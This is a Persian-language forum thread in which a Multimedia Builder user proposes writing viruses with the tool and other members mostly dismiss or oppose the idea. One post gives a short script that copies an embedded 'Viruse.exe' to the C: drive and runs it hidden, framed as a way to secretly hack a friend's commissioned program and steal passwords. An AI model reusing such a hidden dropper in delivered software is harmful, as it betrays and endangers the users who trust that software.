دعوت نامه:ويروس نويسي با بيلدر

Aref_Alikhani

Aref_Alikhani

Well-Known Member
سلام
احتمالاً همتون جمله پايين و شنيدين:
"با يه چاقو هم مي شه آدم كشت و هم مي شه يه ميوه رو پوست كند"
اين مثال براي mmb و تمامي زبان هاي برنامه نويسي ديگه هم صدق مي كنه.
با اجازه از مديران انجمن:
بنده مي خوام از تمامي دوستاني كه در زمينه ويروس نويسي با بيلدر تجربه دارن دعوت كنم تا كه تجربيات خودشون رو در اختيار ديگران نيز قرار بدن.

ما بايد بنا رو بر اين بذاريم كه از اين مطالب در جهت درست استفاده مي شه اگر بخوايم تنها جنبه ي منفي هر چيزي رو در نظر بگيريم هيچ گاه علم پيشرفت نخواهد كرد.

با تشكر عارف
 
Saman

Saman

مدیر انجمن مولتی مدیا بیلدر
دوست عزیز شما فقط کافیه کلمه ی ویروس رو توی انجمن یه جستجو کنید...
نتایج زیادی میبینید...
 
splinter cell

splinter cell

Well-Known Member
چرا از چاقو های بهتری استفاده نمیکنید؟
کلیک کنید تا باز شود...

واقعاً حرفت حسابی بود حامد!
فکرش رو بکن یک ضبط صوت دو کاسته و چهار بانده 10منی بدیم به جیمز باند و بگیم برو توی فلان جلسه و مخفیانه صحبتها رو ضبط کن!!!
اگزه های بیلدر در کوچکترین حالت بین 300تا400کیلو بایت حجم دارند. و این حجم در مقابل ویروسهای چند بایتی امروز خیلی تابلو هست.و به زحمتش هم نمیارزه.حالا Vb رو میگفتید باز یک حرفی بود قابل تامل اما منم پیشنهاد میکنم چاقوتون رو عوض کنید چون چاقوی بیلدر واسه مالیدن کره روی نون خوبه تا........
موفق باشید!
 
splinter cell

splinter cell

Well-Known Member
حداقل ساز فایلهای بیلدر 518 کیلوبایت هستش...
516 تا خود پلیر + 2 کیلو هم فایل خالی...
کلیک کنید تا باز شود...

خوب این بر وخامت اوضاع اضافه میکنه!مرسی سامان جان که تذکر دادی!
با این حال بهتره ویروس نیم مگابایتی رو بیخیال بشیم!
 
Aref_Alikhani

Aref_Alikhani

Well-Known Member
سلام
دوستان عزيز احتمالاً من منظورم رو به خوبي بيان نكردم...
منظور من اينه كه اين ويروس يا هرچي كه اسمش رو مي ذارين همراه با يك پروژه ديگه ارائه بشه يعني كدهاي مخرب در درون پروژه اي معمولي قرار بگيره!!
يك مثال مي زنم:
فرض كنيد يكي از دوستان من سفارش يك برنامه رو ازم گرفته و من هم مي خوام هكش كنم اگر بخوام مي تونم به راحتي با يك ويروس پيش ساخته اين كار رو كنم كه كدهاش هم به اين ترتيب مي شه:
destdir$ = 'C:'
dest$ = destdir$ + '\Viruse.exe'
source$ = '<Embedded>\Viruse.exe'
SysCommand("CopyFile","source$,dest$")
***Run Viruse***
Run("C:Viruse.exe","Hide")
كافيه تروجان يا ويروسي رو درون پروژه Embedded كنم و يا اينكه اونو ور دست پروژم قرار بدم(از كد <SrcDir> استفاده كنم) و كدهاي بالا رو در هر بخش از پروژم كه دلم خواست قرار بدم... .

اما اكثر تروجان ها و ويروس ها به سرعت شناخته مي شن و از انتشارشون جلوگيري مي شه اما ويروس نويسي با بيلدر شايد براي همه تعجب برانگيز و ناشدني باشه كه اين خودش عاملي مهم هست براي اينكه اين ويروسها مدت زيادي پنهان بمونن.

البته نوشتن ويروسي كه براي خرابكاري به كار بره كاري نداره و خيلي راحت مي شه اين كار رو كرد اما ساختن ويروسي كه اين قابليت رو داشته باشه تا پسورد ها رو بزنه مهم و كاربردي هست.

با تشكر عارف
 
Silver Soft

Silver Soft

کاربر متخصص مولتی مدیا بیلدر
:shock:دوست عزيز اونوقت خود ويروس با چي نوشته شده باشه ؟ شما اگه هر ويروسي رو Embedded بازم آنتي ويروس ها ميشناسنش چون موقع اجرا فايلهاي Embedded در پوشه ي Temp باز ميشن ...

در ضمن دوست عزيز شما فکر نکن با MMB ويروس بنويسي آنتي ويروسا نميشناسنش :D آنتي ويروس ها با برنامه ي شما هيچ کاري ندارن مخصوصا يه سريهاشون مثل Nod32 يا KasperSky اونها فقط توابع ويندوز رو هوک ميکنن و با اونها کار دارن و کوچکترين تغييري از زير دستشون در نميره ، امتحانش کار راحتيه ...

شما فکر ميکني که آنتي ويروس شما به برنامتون گير ميده ولي حقيقت اينه که برنامه شما خودش خودش رو به آنتي ويروس معرفي ميکنه \ :lol:
آنتي ويروس هايي مثل Nod32 که kernelMode هستند به هيچ عنوان اين اجازه رو نميدن که برنامتون هر کاري دلش خواست بکنه مثل بعضي آنتي ويروس ها (Panda) و ... اونها مستقيما با هسته ي ويندوز در ارتباط هستند .

وقتي شما با هر نرم افزاري برنامه اي بنويسيد از توابع اشتاندار ويندوز که به آنها API گفته ميشود استفاده کرده ايد توابع استاندارد ويندوز هم که با هسته ي مرکزي ويندوز در ارتباط هستند و هسته هم که زير نظر آنتي ويروس هست پس وقتي شما از يه تابع که نيابد ازش استفاده کنيد استفاده کنيد يا از يه تابع غير از اصولش استفاده کنيد آنتي ويروس به برنامه ي شما شک ميکنه و روش متمرکز ميشه و اگه ببينه اين يه تابع داره مشکل ساز ميشه و ... 3 سوت کله پاش ميکنه ، چون با هسته در ارتباط و کافيه يه پيغام براي بسته شدن برنامه و برداشته شدن آن از صف انتظار داده شه تا برنامه خاتمه پيدا منه :cry:

اين ويروس هاي جديدي که هرروز حمله هايي ميکنن و ماهي يه بار يکيشون معروف ميشه خودشون در سطح KernelMode هستن و يه جورايي رقيب آنتي ويروس هاي kernelMode ميشن و با هم به مبارزه ميپردازن شايد ويروس برنده ي اين بازي باشه ...

:oops: تمامي اين ويروسها (100 %) با زبانهاي C و C++ و اسمبلي نوشته ميشه که ميتونن در حد KernelMode اجرا شن و ميشه طوري ويروس رو نوشت که کمترين اشتفاده از توابع استاندارد رو داشته باشه...

نکته ي بسيار مهم :


ايده ي شما چيزي بيش از يه برنامه ي مخرب نيست ، برنامه ي مخرب با ويروس 1000 تا تفاوت داره .
اين کار با بيلدر بيفايده هستش به قول آقا سامان اون از حجمش که کمه کم نيم مگ ميشه اين هم از اين سرعتش ...
من قبلا يه ويروس ساخته بودم (ويروس نه برنامه ي مخرب ) با اين بيلدر و در انجمن هم گذاشته بودم بگردي پيداش ميکني ...

:cool: مطلب آخر :
بيلدر خودش زاده ي VC++ هست و VC++ هم که نسخه ي ويژوال از C++ هست و 100% براي اينکه ويژوال باشه از توابع استاندارد خود ويندوز استفاده شده ، حالا برنامه اي که شما مينويسيد والدش خود ويندوز هست ، با خودش ميخواي به خودش ضربه وارد کني ؟
 
آخرین ویرایش:
ubuntu

ubuntu

Member
ببخشيد. ميشه يکي از فوايد اين چاقوتون رو بگين؟:?:
در ضمن همون جور که اشاره شد ديگه آنتي ويروس ها همين جوري نميشينند و تنها با ليست سياه خود کار نمي‌کنند. بلکه هر برنامه مشکوکي رو گير مي‌دن. تا جايي که پروپرتيز دسکتاپ رو باز مي‌کني مي‌گه riskware هستش. (شوخي بود جدي نگيرين!) ولي به نظر من ساخت ويروس با mmb بيشتر وجه mmb رو خراب مي‌کنه. همون‌طور که تا کنون بسياري رو از ++C يا VB رنجونده...
به هر حال من مخالفم.:mad:
در ضمن ويروس بايد توانايي تکثير داشته ياشه وگرنه ويروس نيست. تروجات يا اسب تروا هستش.
 
آخرین ویرایش:
ubuntu

ubuntu

Member
اين ويروس هاي جديدي که هرروز حمله هايي ميکنن و ماهي يه بار يکيشون معروف ميشه خودشون در سطح KernelMode هستن و يه جورايي رقيب آنتي ويروس هاي kernelMode ميشن و با هم به مبارزه ميپردازن شايد ويروس برنده ي اين بازي باشه ...
کلیک کنید تا باز شود...
راستي اين رو هم به سخنان دوستمون اضافه کنم که هز چيزي اگه بخواد از دو کيلومتري اين هسته بگذره آنتي ويروس‌ها سايشو با تير مي‌زنن چه برسه که بخواهين اونو جزيي از سيستم جا بزنيد. (حالا اگه فرض کنيم با mmb بشه به هسته ويندوز نفوذ کرد.)
اين هم براي تکميل گفته هاي آقاي گولدن-سافت:
اگه اين آنتي ويروس‌ها رو در تسک منيجر در پروسس ها چک کني جلوي اينها به جاي اسم يوزر مربوطه اين ها رو مي‌بيني.
avp|SYSTEM
nod32|SYSTEM
panda|SYSTEM
کلیک کنید تا باز شود...
يعني جزيي از سيستم به حساب ميان. (avp همون kasper خودمونه!)
 
برای ارسال پاسخ شما باید وارد سیستم شوید.

آخرین مطالب مجیدآنلاین

جدیدترین ارسال ها

بالا